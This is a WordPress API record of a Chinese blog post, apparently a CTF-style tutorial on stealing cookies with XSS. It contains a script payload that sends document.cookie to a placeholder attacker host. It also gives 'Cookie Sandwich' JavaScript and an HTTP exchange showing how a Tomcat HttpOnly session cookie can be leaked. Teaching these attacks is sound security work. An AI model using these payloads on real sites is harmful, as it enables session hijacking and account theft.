{"id":229,"date":"2025-11-07T17:03:18","date_gmt":"2025-11-07T17:03:18","guid":{"rendered":"http:\/\/101.42.175.115\/wordpress\/?p=229"},"modified":"2026-01-07T11:55:13","modified_gmt":"2026-01-07T11:55:13","slug":"xss-cookie","status":"publish","type":"post","link":"http:\/\/101.42.175.115\/wordpress\/?p=229","title":{"rendered":"XSS \u5b9e\u73b0 cookie \u7a83\u53d6"},"content":{"rendered":"\n<h2 class=\"wp-block-heading\">\u5e38\u89c4cookie\u7a83\u53d6<\/h2>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro padding-bottom-disabled cbp-has-line-numbers\" data-code-block-pro-font-family=\"\" style=\"font-size:clamp(16px, 1rem, 24px);--cbp-line-number-color:#393a34;--cbp-line-number-width:calc(1 * 0.6 * 1rem);line-height:clamp(24px, 1.5rem, 36px);--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#464740\">JavaScript<\/span><span role=\"button\" tabindex=\"0\" style=\"color:#393a34;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly># \u83b7\u53d6\u5f53\u524d\u9875\u9762\u7684 cookie\n&lt;script>const cookie=document.cookie;window.location.href='http:\/\/ip:port\/'+encodeURIComponent(cookie);&lt;\/script><\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 
0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki vitesse-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #393A34\"># <\/span><span style=\"color: #B07D48\">\u83b7\u53d6\u5f53\u524d\u9875\u9762\u7684<\/span><span style=\"color: #393A34\"> <\/span><span style=\"color: #B07D48\">cookie<\/span><\/span>\n<span class=\"line\"><span style=\"color: #999999\">&lt;<\/span><span style=\"color: #1E754F\">script<\/span><span style=\"color: #999999\">&gt;<\/span><span style=\"color: #393A34\">const cookie=document.cookie;window.location.href=&#39;http:\/\/ip:port\/&#39;+encodeURIComponent(cookie);<\/span><span style=\"color: #999999\">&lt;\/<\/span><span style=\"color: #1E754F\">script<\/span><span style=\"color: #999999\">&gt;<\/span><\/span><\/code><\/pre><span style=\"display:flex;align-items:flex-end;padding:10px;width:100%;justify-content:flex-end;background-color:#ffffff;color:#464740;font-size:12px;line-height:1;position:relative\">JavaScript<\/span><\/div>\n\n\n\n<p class=\"wp-block-paragraph\">\u6765\u770b\u8fd9\u4e2a payload\uff0c<code>document.cookie<\/code> \u83b7\u53d6 cookie\uff0c\u518d\u901a\u8fc7\u8bbf\u95ee\u653b\u51fb\u673a\u8bfb\u53d6\u9776\u673a\u53d1\u9001\u7684 cookie \u4fe1\u606f\u3002\u53ea\u8981\u7ba1\u7406\u5458\u7528\u6237\u6267\u884c\u4e86\u8fd9\u6bb5 JavaScript \u4ee3\u7801\u5c31\u80fd\u5b9e\u73b0 cookie \u7684\u7a83\u53d6\u3002<\/p>\n\n\n\n<div style=\"height:42px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h2 class=\"wp-block-heading\">HttpOnly_cookie\u7a83\u53d6<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">HttpOnly<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>HttpOnly<\/strong> \u662f\u4e00\u79cd Web \u5b89\u5168\u529f\u80fd\uff0c\u901a\u5e38\u7528\u4e8e HTTP \u54cd\u5e94\u4e2d\u7684 <strong>Set-Cookie<\/strong> \u5934\u90e8\uff0c\u76ee\u7684\u662f\u589e\u5f3a\u6d4f\u89c8\u5668\u4e2d 
Cookie \u7684\u5b89\u5168\u6027\uff0c\u9632\u6b62\u5ba2\u6237\u7aef JavaScript \u8bbf\u95ee\u654f\u611f Cookie \u4fe1\u606f\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u9ed8\u8ba4\u60c5\u51b5\u4e0b\uff0c\u901a\u8fc7 JavaScript \u53ef\u4ee5\u5b9e\u73b0\u8bbf\u95ee Cookie\uff08\u901a\u8fc7 <strong>document.cookie<\/strong> \u6216\u8005 <strong>fetch<\/strong>\uff09\u3002\u5982\u679c\u6076\u610f\u4ee3\u7801\uff08\u5982 XSS\uff09\u88ab\u6ce8\u5165\u5230\u7f51\u7ad9\u4e2d\uff0c\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7 JavaScript \u83b7\u53d6\u8fd9\u4e9b Cookie \u4fe1\u606f\uff0c\u4ece\u800c\u5b9e\u73b0 cookie \u7a83\u53d6\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u4e3a\u9632\u6b62\u8fd9\u79cd\u60c5\u51b5\uff0c<strong>HttpOnly<\/strong> \u6807\u5fd7\u5141\u8bb8\u5f00\u53d1\u8005\u5c06 Cookie \u6807\u8bb0\u4e3a<strong>\u53ea\u53ef\u901a\u8fc7 HTTP \u8bf7\u6c42\u8bbf\u95ee<\/strong>\uff0c\u5373\u8be5 Cookie <strong>\u65e0\u6cd5\u901a\u8fc7 JavaScript \u8bbf\u95ee<\/strong>\u3002\u53ea\u6709 HTTP \u8bf7\u6c42\u624d\u80fd\u53d1\u9001\u5e26\u6709\u8be5 Cookie\u3002<\/p>\n\n\n\n<div style=\"height:45px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\">Cookie Sandwich<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Cookie Sandwich<\/strong> \u5b9e\u73b0\u7684\u539f\u7406\u662f\u6d4f\u89c8\u5668\u4e0e\u670d\u52a1\u5668\u5bf9 cookie \u5934\u89e3\u6790\u7ec6\u8282\u7684\u5dee\u5f02\u3002\u653b\u51fb\u8005\u901a\u8fc7\u5728 cookie \u4e2d\u63d2\u5165<strong>\u5f15\u53f7\u548c\u7279\u6b8a cookie \u540d<\/strong>\uff08\u5982 $Version\uff09\uff0c\u8ba9\u670d\u52a1\u5668\u7684\u89e3\u6790\u5668\u628a<strong>\u771f\u6b63\u7684 HttpOnly cookie<\/strong> \u5f53\u4f5c\u88ab\u5939\u5728<strong>\u4e24\u6bb5\u7279\u6b8a\u6784\u9020\u7684 cookie<\/strong> \u4e2d\u95f4\u7684\u4e00\u6bb5\u6587\u672c\uff0c\u4ece\u800c\u4f7f HttpOnly \u5c5e\u6027\u5931\u6548\u3002<\/p>\n\n\n\n<p 
class=\"wp-block-paragraph\">\u6211\u4eec\u6765\u770b\u4e00\u6bb5 <strong>Apache Tomcat<\/strong> \u4e0b\u7684 payload\uff1a<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro padding-bottom-disabled cbp-has-line-numbers\" data-code-block-pro-font-family=\"\" style=\"font-size:clamp(16px, 1rem, 24px);--cbp-line-number-color:#393a34;--cbp-line-number-width:calc(1 * 0.6 * 1rem);line-height:clamp(24px, 1.5rem, 36px);--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#464740\">JavaScript<\/span><span role=\"button\" tabindex=\"0\" style=\"color:#393a34;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>document.cookie = `$Version=1; domain=${domain}; path=${path};`;\ndocument.cookie = `param1=\"start; domain=${domain}; path=${path};`;\ndocument.cookie = `param2=end\"; domain=${domain}; path=\/;`;<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki vitesse-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #B07D48\">document<\/span><span style=\"color: #999999\">.<\/span><span 
style=\"color: #B07D48\">cookie<\/span><span style=\"color: #393A34\"> <\/span><span style=\"color: #999999\">=<\/span><span style=\"color: #393A34\"> <\/span><span style=\"color: #B5695999\">`<\/span><span style=\"color: #B56959\">$Version=1; domain=<\/span><span style=\"color: #999999\">${<\/span><span style=\"color: #B56959\">domain<\/span><span style=\"color: #999999\">}<\/span><span style=\"color: #B56959\">; path=<\/span><span style=\"color: #999999\">${<\/span><span style=\"color: #B56959\">path<\/span><span style=\"color: #999999\">}<\/span><span style=\"color: #B56959\">;<\/span><span style=\"color: #B5695999\">`<\/span><span style=\"color: #999999\">;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B07D48\">document<\/span><span style=\"color: #999999\">.<\/span><span style=\"color: #B07D48\">cookie<\/span><span style=\"color: #393A34\"> <\/span><span style=\"color: #999999\">=<\/span><span style=\"color: #393A34\"> <\/span><span style=\"color: #B5695999\">`<\/span><span style=\"color: #B56959\">param1=&quot;start; domain=<\/span><span style=\"color: #999999\">${<\/span><span style=\"color: #B56959\">domain<\/span><span style=\"color: #999999\">}<\/span><span style=\"color: #B56959\">; path=<\/span><span style=\"color: #999999\">${<\/span><span style=\"color: #B56959\">path<\/span><span style=\"color: #999999\">}<\/span><span style=\"color: #B56959\">;<\/span><span style=\"color: #B5695999\">`<\/span><span style=\"color: #999999\">;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #B07D48\">document<\/span><span style=\"color: #999999\">.<\/span><span style=\"color: #B07D48\">cookie<\/span><span style=\"color: #393A34\"> <\/span><span style=\"color: #999999\">=<\/span><span style=\"color: #393A34\"> <\/span><span style=\"color: #B5695999\">`<\/span><span style=\"color: #B56959\">param2=end&quot;; domain=<\/span><span style=\"color: #999999\">${<\/span><span style=\"color: #B56959\">domain<\/span><span style=\"color: 
#999999\">}<\/span><span style=\"color: #B56959\">; path=\/;<\/span><span style=\"color: #B5695999\">`<\/span><span style=\"color: #999999\">;<\/span><\/span><\/code><\/pre><span style=\"display:flex;align-items:flex-end;padding:10px;width:100%;justify-content:flex-end;background-color:#ffffff;color:#464740;font-size:12px;line-height:1;position:relative\">JavaScript<\/span><\/div>\n\n\n\n<p class=\"wp-block-paragraph\">\u518d\u770b\u4e00\u770b\u53ef\u80fd\u5b9e\u73b0\u7684\u6548\u679c\uff1a<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro padding-bottom-disabled cbp-has-line-numbers\" data-code-block-pro-font-family=\"\" style=\"font-size:clamp(16px, 1rem, 24px);--cbp-line-number-color:#393a34;--cbp-line-number-width:calc(1 * 0.6 * 1rem);line-height:clamp(24px, 1.5rem, 36px);--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#464740\">HTTP<\/span><span role=\"button\" tabindex=\"0\" style=\"color:#393a34;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>GET \/ HTTP\/1.1\nCookie: $Version=1; param1=\"start; sessionId=secret; param2=end\"\n=>\nHTTP\/1.1 200 OK\nSet-Cookie: param1=\"start; sessionId=secret; param2=end\";<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 
2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki vitesse-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #1E754F\">GET<\/span><span style=\"color: #393A34\"> \/ <\/span><span style=\"color: #1E754F\">HTTP<\/span><span style=\"color: #393A34\">\/<\/span><span style=\"color: #2F798A\">1.1<\/span><\/span>\n<span class=\"line\"><span style=\"color: #1E754F\">Cookie:<\/span><span style=\"color: #393A34\"> <\/span><span style=\"color: #B56959\">$Version=1; param1=&quot;start; sessionId=secret; param2=end&quot;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">=&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">HTTP\/1.1 200 OK<\/span><\/span>\n<span class=\"line\"><span style=\"color: #1E754F\">Set-Cookie:<\/span><span style=\"color: #393A34\"> <\/span><span style=\"color: #B56959\">param1=&quot;start; sessionId=secret; param2=end&quot;;<\/span><\/span><\/code><\/pre><span style=\"display:flex;align-items:flex-end;padding:10px;width:100%;justify-content:flex-end;background-color:#ffffff;color:#464740;font-size:12px;line-height:1;position:relative\">HTTP<\/span><\/div>\n\n\n\n<p class=\"wp-block-paragraph\">\u5de5\u4f5c\u539f\u7406\uff1a<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>\u670d\u52a1\u5668\u5728\u89e3\u6790 cookie \u65f6\uff0c\u5982\u679c cookie \u4ee5\u7279\u6b8a\u7684 <strong>$Version<\/strong> \u5c5e\u6027\u5f00\u5934\uff0c\u5219\u9ed8\u8ba4\u4f7f\u7528<strong>\u65e7\u5f0f\u89e3\u6790\u903b\u8f91<\/strong>\u3002\u5982\u679c cookie \u503c\u4ee5\u53cc\u5f15\u53f7\u5f00\u5934\uff0c\u5219\u4f1a\u7ee7\u7eed\u8bfb\u53d6\uff0c\u76f4\u5230\u9047\u5230\u4e0b\u4e00\u4e2a\u672a\u8f6c\u4e49\u7684\u53cc\u5f15\u53f7\u5b57\u7b26\u3002<\/li>\n\n\n\n<li>\u5bf9\u4e8e Cookie \u7684\u987a\u5e8f\uff0cpath 
\u5185\u5bb9\u591a\u7684\u4f1a\u6392\u5728\u524d\u9762\uff0c\u5148\u8bbe\u7f6e\u7684\u6392\u5728\u524d\u9762\u3002<\/li>\n<\/ol>\n\n\n\n<p class=\"wp-block-paragraph\">\u901a\u8fc7\u5de7\u5999\u7684\u6784\u9020\u5b9e\u73b0\u539f\u9875\u9762\u7684 cookie \u4f4d\u4e8e\u6784\u9020 cookie \u7684\u4e2d\u95f4\uff0c\u670d\u52a1\u5668\u5728\u89e3\u6790\u65f6\u5c31\u80fd\u5b9e\u73b0\u539f\u9875\u9762\u7684 HttpOnly \u5c5e\u6027\u5931\u6548\uff0c\u4ece\u800c\u901a\u8fc7\u54cd\u5e94\u56de\u663e\u51fa\u6765\u3002<\/p>\n","protected":false},"excerpt":{"rendered":"\u5e38\u89c4cookie\u7a83\u53d6 \u6765\u770b\u8fd9\u4e2a payload\uff0cdocument.cookie \u83b7\u53d6 cookie\uff0c\u518d\u901a\u8fc7\u8bbf\u95ee\u653b\u51fb\u673a\u8bfb\u53d6\u9776\u673a\u53d1\u9001\u7684 cookie \u4fe1\u606f\u3002\u53ea\u8981\u7ba1\u7406\u5458\u7528\u6237\u6267\u884c\u4e86\u8fd9\u6bb5 JavaScript \u4ee3\u7801\u5c31\u80fd\u5b9e\u73b0 cookie \u7684\u7a83\u53d6\u3002 H......","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"emotion":"","emotion_color":"","title_style":"","license":"","footnotes":""},"categories":[23],"tags":[33,9,34,32],"class_list":["post-229","post","type-post","status-publish","format-standard","hentry","category-web-security","tag-cookie","tag-ctf","tag-javascript","tag-xss"],"_links":{"self":[{"href":"http:\/\/101.42.175.115\/wordpress\/index.php?rest_route=\/wp\/v2\/posts\/229","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/101.42.175.115\/wordpress\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/101.42.175.115\/wordpress\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/101.42.175.115\/wordpress\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/101.42.175.115\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=229"}],"version-history":[{"count":10,"href":"ht
tp:\/\/101.42.175.115\/wordpress\/index.php?rest_route=\/wp\/v2\/posts\/229\/revisions"}],"predecessor-version":[{"id":503,"href":"http:\/\/101.42.175.115\/wordpress\/index.php?rest_route=\/wp\/v2\/posts\/229\/revisions\/503"}],"wp:attachment":[{"href":"http:\/\/101.42.175.115\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=229"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/101.42.175.115\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=229"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/101.42.175.115\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=229"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}